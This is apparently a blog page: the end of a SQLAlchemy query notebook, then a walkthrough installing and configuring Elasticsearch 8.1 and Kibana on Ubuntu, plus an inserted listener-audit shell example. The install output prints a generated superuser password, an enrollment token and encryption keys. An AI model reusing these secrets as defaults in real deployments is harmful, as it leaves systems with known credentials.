<span style="color: #ffffff">df_blogs.to_sql(name=</span><span style="color: #0086d2">'blogs'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">con=securitynik_db_connection,</span> <span style="color: #ffffff">if_exists=</span><span style="color: #0086d2">'append'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">index=</span><span style="color: #fb660a; font-weight: bold">False</span><span style="color: #ffffff">)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[20]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2"> With the data added to the various tables</span>
<span style="color: #0086d2"> time to query them.</span>
<span style="color: #0086d2"> Select all records from the employees table</span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">result_proxy</span> <span style="color: #ffffff">=</span> <span style="color: #ffffff">securitynik_db_connection.execute(select(employee_table)).fetchall()</span>
<span style="color: #ffffff">result_proxy</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[21]:</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># How many records are there in the Employees table</span>
<span style="color: #ffffff">len(result_proxy)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[22]:</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># Get a sample result Key</span>
<span style="color: #ffffff">result_proxy[</span><span style="color: #0086f7; font-weight: bold">0</span><span style="color: #ffffff">].keys()</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[23]:</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># With the result key, iterate through the results</span>
<span style="color: #ffffff">print(</span><span style="color: #0086d2">'EmployeeID | FName | LName | Active | Comments '</span><span style="color: #ffffff">)</span>
<span style="color: #fb660a; font-weight: bold">for</span> <span style="color: #ffffff">result</span> <span style="color: #ffffff">in</span> <span style="color: #ffffff">result_proxy:</span>
<span style="color: #ffffff">print(f</span><span style="color: #0086d2">'{result.EmployeeID} | {result.FName} | {result.LName} | { result.Active } | {result.Comments}'</span><span style="color: #ffffff">)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[24]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">Building on the query, adding a where clause</span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">securitynik_db_connection.execute(select(employee_table).where(employee_table.columns.LName==</span><span style="color: #0086d2">'Alleyne'</span><span style="color: #ffffff">)).fetchmany(size=</span><span style="color: #0086f7; font-weight: bold">5</span><span style="color: #ffffff">)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[25]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">Building on the above query, taking advantage of 'and_'</span>
<span style="color: #0086d2">to compound the query.</span>
<span style="color: #0086d2">Leveraging both .columns and .c </span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">securitynik_db_connection.execute(select(employee_table).where(and_(</span>
<span style="color: #ffffff">employee_table.columns.LName==</span><span style="color: #0086d2">'Alleyne'</span><span style="color: #ffffff">,</span>
<span style="color: #ffffff">employee_table.c.FName==</span><span style="color: #0086d2">'Nik'</span><span style="color: #ffffff">,</span>
<span style="color: #ffffff">employee_table.c.Active==</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">))).fetchone()</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[26]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">Taking advantage of 'or_'</span>
<span style="color: #0086d2">to compound the query.</span>
<span style="color: #0086d2">Leveraging both .columns and .c </span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">securitynik_db_connection.execute(select(employee_table).where(or_(</span>
<span style="color: #ffffff">employee_table.columns.LName==</span><span style="color: #0086d2">'Alleyne'</span><span style="color: #ffffff">,</span>
<span style="color: #ffffff">employee_table.c.FName==</span><span style="color: #0086d2">'Nik'</span><span style="color: #ffffff">,</span>
<span style="color: #ffffff">employee_table.c.Active==</span><span style="color: #fb660a; font-weight: bold">False</span><span style="color: #ffffff">))).fetchmany(size=</span><span style="color: #0086f7; font-weight: bold">5</span><span style="color: #ffffff">)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[27]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">Looking at columns in the blog table </span>
<span style="color: #0086d2">identify all records where the URL field is NULL</span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">securitynik_db_connection.execute(select(blogs_table).where(blogs_table.columns.URL==</span><span style="color: #fb660a; font-weight: bold">None</span><span style="color: #ffffff">)).fetchmany(size=</span><span style="color: #0086f7; font-weight: bold">5</span><span style="color: #ffffff">)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[29]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">Looking for all records where the URL is not NULL in the blogs table </span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">securitynik_db_connection.execute(select(blogs_table).where(blogs_table.columns.URL!=</span><span style="color: #fb660a; font-weight: bold">None</span><span style="color: #ffffff">)).fetchmany(size=</span><span style="color: #0086f7; font-weight: bold">5</span><span style="color: #ffffff">)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[32]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">Finding records using Like</span>
<span style="color: #0086d2">Looking specifically for records where the title contains kibana</span>
<span style="color: #0086d2">Note I am ignoring the case by using ilike</span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">securitynik_db_connection.execute(select(blogs_table).where(blogs_table.columns.BlogTitle.ilike(</span><span style="color: #0086d2">'%Kibana%'</span><span style="color: #ffffff">))).fetchmany(size=</span><span style="color: #0086f7; font-weight: bold">5</span><span style="color: #ffffff">)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[46]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">Revisiting the employee table </span>
<span style="color: #0086d2">ordering by Employee FName</span>
<span style="color: #0086d2">Do it descending, as in going from Z to A rather than A to Z</span>
<span style="color: #0086d2">Limit the results to 5 records</span>
<span style="color: #0086d2">Only return the employee first and last name</span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">securitynik_db_connection.execute(select(employee_table.columns.FName,</span> <span style="color: #ffffff">employee_table.c.LName).order_by(desc(employee_table.columns.FName)).limit(</span><span style="color: #0086f7; font-weight: bold">5</span><span style="color: #ffffff">)).fetchall()</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[55]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">Updating records where Comments is NULL in the blogs table</span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">securitynik_db_connection.execute(update(blogs_table).where(blogs_table.c.Comments</span> <span style="color: #ffffff">==</span> <span style="color: #fb660a; font-weight: bold">None</span><span style="color: #ffffff">).values(Comments=</span><span style="color: #0086d2">'SecurityNik is the blogger'</span><span style="color: #ffffff">)).rowcount</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[57]:</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># Verifying the change was made on the blog table</span>
<span style="color: #ffffff">securitynik_db_connection.execute(select(blogs_table.columns.Comments)).fetchall()</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[60]:</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># Delete the records we just created above</span>
<span style="color: #ffffff">securitynik_db_connection.execute(delete(blogs_table).where(blogs_table.c.Comments</span> <span style="color: #ffffff">==</span><span style="color: #0086d2">'SecurityNik is the blogger'</span><span style="color: #ffffff">)).rowcount</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[64]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">Drop the other table</span>
<span style="color: #0086d2">'''</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f">#other_table.drop(securitynik_db_engine)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[ ]:</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># Drop all tables</span>
<span style="color: #ffffff">metadata.drop_all(securitynik_db_engine)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[28]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">References:</span>
<span style="color: #0086d2">https://campus.datacamp.com/courses/introduction-to-relational-databases-in-python</span>
<span style="color: #0086d2">https://www.sqlalchemy.org/library.html</span>
<span style="color: #0086d2">https://buildmedia.readthedocs.org/media/pdf/sqlalchemy/rel_1_0/sqlalchemy.pdf</span>
<span style="color: #0086d2">https://www.tutorialspoint.com/sqlalchemy/sqlalchemy_quick_guide.htm</span>
<span style="color: #0086d2">https://www.topcoder.com/thrive/articles/sqlalchemy-1-4-and-2-0-transitional-introduction</span>
<span style="color: #0086d2">https://overiq.com/sqlalchemy-101/installing-sqlalchemy-and-connecting-to-database/</span>
<span style="color: #0086d2">'''</span>
</pre></td></tr></table></div>
Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com0tag:blogger.com,1999:blog-7303400454979750101.post-34044229570383948882022-04-07T09:02:00.002-07:002022-04-07T09:02:44.843-07:00Installing & configuring Elasticsearch 8 and Kibana 8 on Ubuntu<p>In a <a href="https://www.securitynik.com/2020/10/security-on-cheap-beginning-elastic.html" target="_blank">previous post</a>, we installed Elastic 7.1x. In this post, we are installing the new shiny toy from Elastic, Elastic 8.1.</p><p>First up, install the Elastic public signing key.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo gpg --dearmor -o /usr/share/keyrings/elasticsearch-keyring.gpg</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Install the apt-transport-https package</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ sudo apt-get install apt-transport-https</span>
<span style="color: white;">...</span>
<span style="color: white;">Preparing to unpack .../apt-transport-https_2.0.6_all.deb ...</span>
<span style="color: white;">Unpacking apt-transport-https (2.0.6) ...</span>
<span style="color: white;">Setting up apt-transport-https (2.0.6) ..</span>
</pre></div>
</div><div><br /></div><div><div>Save the Elastic repo information</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ echo "deb [signed-by=/usr/share/keyrings/elasticsearch-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | sudo tee /etc/apt/sources.list.d/elastic-8.x.list</span>
<span style="color: white;">deb [signed-by=/usr/share/keyrings/elasticsearch-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main</span>
</pre></div>
</div><div><br /></div><div><div>Install Elasticsearch 8.1</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ sudo apt-get update && sudo apt-get install elasticsearch</span>
<span style="color: white;">------------</span>
<span style="color: white;">The following NEW packages will be installed:</span>
<span style="color: white;"> elasticsearch</span>
<span style="color: white;">...</span>
<span style="color: white;">Preparing to unpack .../elasticsearch_8.1.1_amd64.deb ...</span>
<span style="color: white;">Creating elasticsearch group... OK</span>
<span style="color: white;">Creating elasticsearch user... OK</span>
<span style="color: white;">Unpacking elasticsearch (8.1.1) ...</span>
<span style="color: white;">Setting up elasticsearch (8.1.1) ...</span>
<span style="color: white;">--------------------------- Security autoconfiguration information ------------------------------</span>
<span style="color: white;">Authentication and authorization are enabled.</span>
<span style="color: white;">TLS for the transport and HTTP layers is enabled and configured.</span>
<span style="color: white;">The generated password for the elastic built-in superuser is : Laqr4gkhwa-Do=Ctia15</span>
<span style="color: white;">If this node should join an existing cluster, you can reconfigure this with</span>
<span style="color: white;">'/usr/share/elasticsearch/bin/elasticsearch-reconfigure-node --enrollment-token <token-here>'</span>
<span style="color: white;">after creating an enrollment token on your existing cluster.</span>
<span style="color: white;">You can complete the following actions at any time:</span>
<span style="color: white;">Reset the password of the elastic built-in superuser with</span>
<span style="color: white;">'/usr/share/elasticsearch/bin/elasticsearch-reset-password -u elastic'.</span>
<span style="color: white;">Generate an enrollment token for Kibana instances with</span>
<span style="color: white;"> '/usr/share/elasticsearch/bin/elasticsearch-create-enrollment-token -s kibana'.</span>
<span style="color: white;">Generate an enrollment token for Elasticsearch nodes with</span>
<span style="color: white;">'/usr/share/elasticsearch/bin/elasticsearch-create-enrollment-token -s node'.</span>
<span style="color: white;">-------------------------------------------------------------------------------------------------</span>
<span style="color: white;">### NOT starting on installation, please execute the following statements to configure elasticsearch service to start automatically using systemd</span>
<span style="color: white;"> sudo systemctl daemon-reload</span>
<span style="color: white;"> sudo systemctl enable elasticsearch.service</span>
<span style="color: white;">### You can start elasticsearch service by executing</span>
<span style="color: white;"> sudo systemctl start elasticsearch.service</span>
<span style="color: white;">-----------</span>
</pre></div>
</div><div><br /></div><div>Make configuration changes to customize this deployment for our environment. First, make a backup copy of the configuration file.</div><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ sudo cp /etc/elasticsearch/elasticsearch.yml /etc/elasticsearch/elasticsearch.yml.ORIGINAL</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Here are the changes to my <i>elasticsearch.yml. </i></p><div><i><!--HTML generated using hilite.me--></i><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ sudo grep --invert-match "^#" /etc/elasticsearch/elasticsearch.yml</span>
<span style="color: white;">cluster.name: n3-elastic</span>
<span style="color: white;">node.name: securitynik.n3.local</span>
<span style="color: white;">node.attr.rack: ServerCloset</span>
<span style="color: white;">path.data: /var/lib/elasticsearch</span>
<span style="color: white;">path.logs: /var/log/elasticsearch</span>
<span style="color: white;">network.host: securitynik.local</span>
<span style="color: white;">http.port: 9200</span>
<span style="color: white;">xpack.security.enabled: true</span>
<span style="color: white;">xpack.security.enrollment.enabled: true</span>
<span style="color: white;">xpack.security.http.ssl:</span>
<span style="color: white;"> enabled: true</span>
<span style="color: white;"> keystore.path: certs/http.p12</span>
<span style="color: white;">xpack.security.transport.ssl:</span>
<span style="color: white;"> enabled: true</span>
<span style="color: white;"> verification_mode: certificate</span>
<span style="color: white;"> keystore.path: certs/transport.p12</span>
<span style="color: white;"> truststore.path: certs/transport.p12</span>
<span style="color: white;">cluster.initial_master_nodes: ["securitynik"]</span>
<span style="color: white;">http.host: [_local_, _site_]</span>
</pre></div>
</div><div><br /></div><div><div>Adjust the Java Virtual Machine (JVM) heap size by creating a file under <i>/etc/elasticsearch/jvm.options.d/</i>.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ sudo cat /etc/elasticsearch/jvm.options.d/jvm.options</span>
<span style="color: white;">-Xms16g</span>
<span style="color: white;">-Xmx16g</span>
</pre></div>
</div><div><br /></div><div><div>Add the new host information to my hosts file, just in case DNS is not working.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ sudo bash -c "echo 10.0.0.4 peeping-tom peeping-tom.n3.local >> /etc/hosts"<br /></span><span style="color: white;">securitynik@securitynik:~$ grep peeping-tom /etc/hosts<br /></span><span style="color: white;">127.0.1.1 securitynik</span>
<span style="color: white;">10.0.0.4 securitynik securitynik.local</span>
</pre></div>
</div><div><br /></div><div>Make a copy of the HTTP-layer CA certificate (<i>http_ca.crt</i>) to <i>/etc/ssl/certs</i>, so that it is in a location easily readable by the rest of the applications.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ sudo cp /etc/elasticsearch/certs/http_ca.crt /etc/ssl/certs -v</span>
</pre></div><div><br /></div><div>Reload the <i>systemd</i> daemon, then enable, start and verify the Elasticsearch service.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ sudo /bin/systemctl enable elasticsearch.service</span>
<span style="color: white;">Created symlink /etc/systemd/system/multi-user.target.wants/elasticsearch.service → /lib/systemd/system/elasticsearch.service.</span>
<span style="color: white;">securitynik@securitynik:~$ sudo systemctl start elasticsearch.service</span>
<span style="color: white;">securitynik@securitynik:~$ systemctl status elasticsearch.service</span>
<span style="color: white;">● elasticsearch.service - Elasticsearch</span>
<span style="color: white;"> Loaded: loaded (/lib/systemd/system/elasticsearch.service; enabled; vendor preset: enabled)</span>
<span style="color: white;"> Active: active (running) since Wed 2022-03-30 19:53:03 EDT; 18s ago</span>
<span style="color: white;"> Docs: https://www.elastic.co</span>
<span style="color: white;"> Main PID: 76746 (java)</span>
<span style="color: white;"> Tasks: 80 (limit: 38298)</span>
<span style="color: white;"> Memory: 16.9G</span>
<span style="color: white;"> CGroup: /system.slice/elasticsearch.service</span>
<span style="color: white;"> ├─76746 /usr/share/elasticsearch/jdk/bin/java -Xshare:auto -Des.networkaddress.cache.ttl=60 -Des.networkaddress.cac></span>
<span style="color: white;"> └─77051 /usr/share/elasticsearch/modules/x-pack-ml/platform/linux-x86_64/bin/controller</span>
<span style="color: white;">Mar 30 19:52:47 securitynik systemd[1]: Starting Elasticsearch...</span>
<span style="color: white;">Mar 30 19:53:03 securitynik systemd[1]: Started Elasticsearch.</span>
<span style="color: white;">lines 1-13/13 (END)</span>
</pre></div>
</div><div><br /></div><div><div>Confirming the Elasticsearch ports are listening for incoming communication.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ sudo ss --numeric --listening --tcp --processes | grep --perl-regexp "9300|9200"</span>
<span style="color: white;">LISTEN 0 4096 [::ffff:10.0.0.4]:9200 *:* users:(("java",pid=76746,fd=386))</span>
<span style="color: white;">LISTEN 0 4096 [::ffff:127.0.0.1]:9200 *:* users:(("java",pid=76746,fd=385))</span>
<span style="color: white;">LISTEN 0 4096 [::1]:9200 [::]:* users:(("java",pid=76746,fd=384))</span>
<span style="color: white;">LISTEN 0 4096 [::ffff:10.0.0.4]:9300 *:* users:(("java",pid=76746,fd=382))</span>
</pre></div>
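<p>As an added check on the <i>ss</i> listing above (example code, not from the post): the function below parses that same output format and reports any watched port that is bound to an address outside an allow-list, which is the kind of drift that shows up when <i>network.host</i> is later changed to 0.0.0.0. The sample output is constructed from the post's listing plus one hypothetical sshd line bound to 0.0.0.0; <i>audit_listeners</i> and <i>SAMPLE_SS_OUTPUT</i> are the example's own names.</p>

```shell
#!/usr/bin/env bash
# Added example (not from the original post): check which addresses the
# Elasticsearch ports are bound to, using the same
#   ss --numeric --listening --tcp --processes
# output format shown above. A watched port bound to an address outside the
# allow-list is reported.

# Constructed sample, modelled on the post's listing plus one hypothetical
# wildcard-bound service on port 22 to show what a finding looks like.
SAMPLE_SS_OUTPUT='LISTEN 0 4096 [::ffff:10.0.0.4]:9200 *:* users:(("java",pid=76746,fd=386))
LISTEN 0 4096 [::ffff:127.0.0.1]:9200 *:* users:(("java",pid=76746,fd=385))
LISTEN 0 4096 [::1]:9200 [::]:* users:(("java",pid=76746,fd=384))
LISTEN 0 4096 [::ffff:10.0.0.4]:9300 *:* users:(("java",pid=76746,fd=382))
LISTEN 0 128 0.0.0.0:22 0.0.0.0:* users:(("sshd",pid=1234,fd=3))'

# audit_listeners ALLOWED_ADDRS PORTS   (stdin: ss output)
#   ALLOWED_ADDRS: space-separated addresses that may expose PORTS
#   PORTS:         space-separated ports to examine
# Prints one line per unexpected listener; returns 0 if none, 1 otherwise.
audit_listeners() {
  local allowed="$1" ports="$2" rc=0 state rq sq local_addr rest addr port
  # Fields: State Recv-Q Send-Q Local-Address:Port Peer-Address:Port Process
  while read -r state rq sq local_addr rest; do
    port=${local_addr##*:}
    addr=${local_addr%:*}
    # Skip header lines or anything without a numeric port
    case "$port" in ''|*[!0-9]*) continue ;; esac
    # [::ffff:10.0.0.4] -> 10.0.0.4 ; [::1] -> ::1 ; 0.0.0.0 stays as-is
    addr=${addr#\[}; addr=${addr%\]}; addr=${addr#::ffff:}
    # Only ports we were asked about
    case " $ports " in *" $port "*) ;; *) continue ;; esac
    case " $allowed " in
      *" $addr "*) ;;
      *) printf 'unexpected listener on %s:%s\n' "$addr" "$port"; rc=1 ;;
    esac
  done
  return $rc
}

# Demonstration: the Elasticsearch ports pass, the wildcard listener on 22 is reported.
# Real use: sudo ss --numeric --listening --tcp --processes | audit_listeners "10.0.0.4 127.0.0.1 ::1" "9200 9300"
printf '%s\n' "$SAMPLE_SS_OUTPUT" | audit_listeners "10.0.0.4 127.0.0.1 ::1" "9200 9300 22" || :
```

<p>The allow-list is deliberately a list of addresses rather than interfaces: on this host 9200 is reachable on the site address and loopback only, so anything else appearing on 9200 or 9300 after a configuration change is worth a look before Kibana or any other client is pointed at it.</p>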
</div><div><br /></div><div><div>Connecting to the Elasticsearch service via https</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ sudo curl https://10.0.0.4:9200 --cacert /etc/elasticsearch/certs/http_ca.crt -u elastic</span>
<span style="color: white;">Enter host password for user 'elastic':</span>
<span style="color: white;">{</span>
<span style="color: white;"> "name" : "securitynik.n3.local",</span>
<span style="color: white;"> "cluster_name" : "n3-elastic",</span>
<span style="color: white;"> "cluster_uuid" : "KDh-JRfXQtuXjXo2hniQjg",</span>
<span style="color: white;"> "version" : {</span>
<span style="color: white;"> "number" : "8.1.1",</span>
<span style="color: white;"> "build_flavor" : "default",</span>
<span style="color: white;"> "build_type" : "deb",</span>
<span style="color: white;"> "build_hash" : "d0925dd6f22e07b935750420a3155db6e5c58381",</span>
<span style="color: white;"> "build_date" : "2022-03-17T22:01:32.658689558Z",</span>
<span style="color: white;"> "build_snapshot" : false,</span>
<span style="color: white;"> "lucene_version" : "9.0.0",</span>
<span style="color: white;"> "minimum_wire_compatibility_version" : "7.17.0",</span>
<span style="color: white;"> "minimum_index_compatibility_version" : "7.0.0"</span>
<span style="color: white;"> },</span>
<span style="color: white;"> "tagline" : "You Know, for Search"</span>
<span style="color: white;">}</span>
</pre></div>
</div><div><br /></div><div><div>Good stuff! We have validated Elasticsearch is working as expected.</div></div><div><br /></div><div><h2 style="text-align: left;"><b>Installing Kibana on Ubuntu</b></h2></div><div>Considering all the heavy lifting was done above, time to install Kibana.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ sudo apt-get update && sudo apt-get install kibana</span>
<span style="color: white;">...</span>
<span style="color: white;">Preparing to unpack .../kibana_8.1.1_amd64.deb ...</span>
<span style="color: white;">Unpacking kibana (8.1.1) ...</span>
<span style="color: white;">Setting up kibana (8.1.1) ...</span>
<span style="color: white;">Creating kibana group... OK</span>
<span style="color: white;">Creating kibana user... OK</span>
<span style="color: white;">Created Kibana keystore in /etc/kibana/kibana.keystore</span>
</pre></div>
</div><div><br /></div><div>Make a copy of the Kibana configuration file.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ sudo cp /etc/kibana/kibana.yml /etc/kibana.yml.ORIGINAL</span>
</pre></div>
</div><div><br /></div><div><div>Generate an enrollment token for Kibana.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ sudo /usr/share/elasticsearch/bin/elasticsearch-create-enrollment-token --scope kibana</span>
<span style="color: white;">eyM4XXIiOiI4LjEuMSIsImFkciI6WyIxOTIuMTY4LjAuNDo5MjAwIl0sImZnciI6ImUyMjRhMTkyMzkwMzE1MzM2MjM5MjFmMDMyYjZhOTVlMDcwZDY3Mzk2NGE0M2ZmOWQ5OWU5OTc3ZmI4NTI2YmYiLCJrZXkiOiI0c25pM1g4QmtmdzFwTU9VUDEyqapaOTg9DTJtSFNtLTFMSjVzX3g0ckZ3In0=</span>
</pre></div>
</div><div><br /></div><div><div>Generate encryption keys for SavedObjects, Reports, Dashboards, etc.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ sudo /usr/share/kibana/bin/kibana-encryption-keys generate</span>
<span style="color: white;">## Kibana Encryption Key Generation Utility</span>
<span style="color: white;">The 'generate' command guides you through the process of setting encryption keys for:</span>
<span style="color: white;">xpack.encryptedSavedObjects.encryptionKey</span>
<span style="color: white;"> Used to encrypt stored objects such as dashboards and visualizations</span>
<span style="color: white;"> https://www.elastic.co/guide/en/kibana/current/xpack-security-secure-saved-objects.html#xpack-security-secure-saved-objects</span>
<span style="color: white;">xpack.reporting.encryptionKey</span>
<span style="color: white;"> Used to encrypt saved reports</span>
<span style="color: white;"> https://www.elastic.co/guide/en/kibana/current/reporting-settings-kb.html#general-reporting-settings</span>
<span style="color: white;">xpack.security.encryptionKey</span>
<span style="color: white;"> Used to encrypt session information</span>
<span style="color: white;"> https://www.elastic.co/guide/en/kibana/current/security-settings-kb.html#security-session-and-cookie-settings</span>
<span style="color: white;">Already defined settings are ignored and can be regenerated using the --force flag. Check the documentation links for instructions on how to rotate encryption keys.</span>
<span style="color: white;">Definitions should be set in the kibana.yml used configure Kibana.</span>
<span style="color: white;">Settings:</span>
<span style="color: white;">xpack.encryptedSavedObjects.encryptionKey: f4667a5634faf22053dbd40d91afa8b5</span>
<span style="color: white;">xpack.reporting.encryptionKey: f03f17de223aced044cd3afb42de3137</span>
<span style="color: white;">xpack.security.encryptionKey: f17be84bbaa17dc9cb8a06cb95e0d5be</span>
</pre></div>
<div><br /></div><div><div>Add the last three lines from above to the <i>kibana.yml</i> file, then enable and start the Kibana service.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ sudo /bin/systemctl daemon-reload</span>
<span style="color: white;">securitynik@securitynik:~$ sudo /bin/systemctl enable kibana.service</span>
<span style="color: white;">securitynik@securitynik:~$ sudo systemctl start kibana.service</span>
<span style="color: white;">-------------</span>
